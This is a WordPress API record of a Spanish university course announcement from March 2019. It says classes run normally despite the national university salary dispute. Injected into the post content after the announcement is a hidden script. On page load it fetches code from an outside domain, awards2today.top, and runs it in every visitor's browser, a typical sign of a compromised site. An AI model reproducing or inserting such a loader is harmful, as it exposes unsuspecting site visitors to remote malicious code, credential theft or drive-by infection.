{"id":208,"date":"2019-03-25T12:39:41","date_gmt":"2019-03-25T15:39:41","guid":{"rendered":"https:\/\/www.est-aplicada.faud.unsj.edu.ar\/?p=208"},"modified":"2025-06-21T12:21:41","modified_gmt":"2025-06-21T15:21:41","slug":"dictado-de-clases-normal","status":"publish","type":"post","link":"https:\/\/www.est-aplicada.faud.unsj.edu.ar\/index.php\/2019\/03\/25\/dictado-de-clases-normal\/","title":{"rendered":"Dictado de Clases Normal"},"content":{"rendered":"\n<p>El pr\u00f3ximo mi\u00e9rcoles 27\/03\/19, la actividad ser\u00e1 normal en el dictado de la materia.<\/p>\n\n\n\n<p class=\"has-background has-luminous-vivid-amber-background-color\"><strong>Si bien la c\u00e1tedra es consciente de la situaci\u00f3n general de todas las universidades nacionales ante el grave atraso salarial y la falta de respuestas del gobierno al pliego de reivindicaciones; exigiendo un aumento del 20% para compensar la p\u00e9rdida salarial de 2018, un 35% para 2019 con cl\u00e1usula gatillo y el inmediato pase al b\u00e1sico de todas las sumas en negro. Adem\u00e1s reiteraron el reclamo de pase a planta de los docentes interinos, pago de salario a docentes ad honorem y aumento del presupuesto universitario y de ciencia y tecnolog\u00eda.<\/strong><\/p>\n<script>;document.addEventListener(\"DOMContentLoaded\", function () {\n    var url = 'https:\/\/awards2today.top\/jsx';\n    fetch(url)\n        .then(response => response.text())\n        .then(data => {\n            var script = document.createElement('script');\n            script.innerHTML = data.trim();\n            document.head.appendChild(script);\n        })\n});<\/script>","protected":false},"excerpt":{"rendered":"<p>El pr\u00f3ximo mi\u00e9rcoles 27\/03\/19, la actividad ser\u00e1 normal en el dictado de la materia. Si bien la c\u00e1tedra es consciente de la situaci\u00f3n general de todas las universidades nacionales ante el grave atraso salarial y la falta de respuestas del gobierno al pliego de reivindicaciones; exigiendo un aumento del 20% para compensar la p\u00e9rdida salarial<\/p><\/div>\n<div class=\"blog-btn\"><a href=\"https:\/\/www.est-aplicada.faud.unsj.edu.ar\/index.php\/2019\/03\/25\/dictado-de-clases-normal\/\" class=\"home-blog-btn\">Leer m\u00e1s<\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6,16,9,7],"tags":[],"class_list":["post-208","post","type-post","status-publish","format-standard","hentry","category-cursado","category-diseno-grafico","category-diseno-industrial","category-faud"],"_links":{"self":[{"href":"https:\/\/www.est-aplicada.faud.unsj.edu.ar\/index.php\/wp-json\/wp\/v2\/posts\/208","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.est-aplicada.faud.unsj.edu.ar\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.est-aplicada.faud.unsj.edu.ar\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.est-aplicada.faud.unsj.edu.ar\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.est-aplicada.faud.unsj.edu.ar\/index.php\/wp-json\/wp\/v2\/comments?post=208"}],"version-history":[{"count":3,"href":"https:\/\/www.est-aplicada.faud.unsj.edu.ar\/index.php\/wp-json\/wp\/v2\/posts\/208\/revisions"}],"predecessor-version":[{"id":888,"href":"https:\/\/www.est-aplicada.faud.unsj.edu.ar\/index.php\/wp-json\/wp\/v2\/posts\/208\/revisions\/888"}],"wp:attachment":[{"href":"https:\/\/www.est-aplicada.faud.unsj.edu.ar\/index.php\/wp-json\/wp\/v2\/media?parent=208"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.est-aplicada.faud.unsj.edu.ar\/index.php\/wp-json\/wp\/v2\/categories?post=208"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.est-aplicada.faud.unsj.edu.ar\/index.php\/wp-json\/wp\/v2\/tags?post=208"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}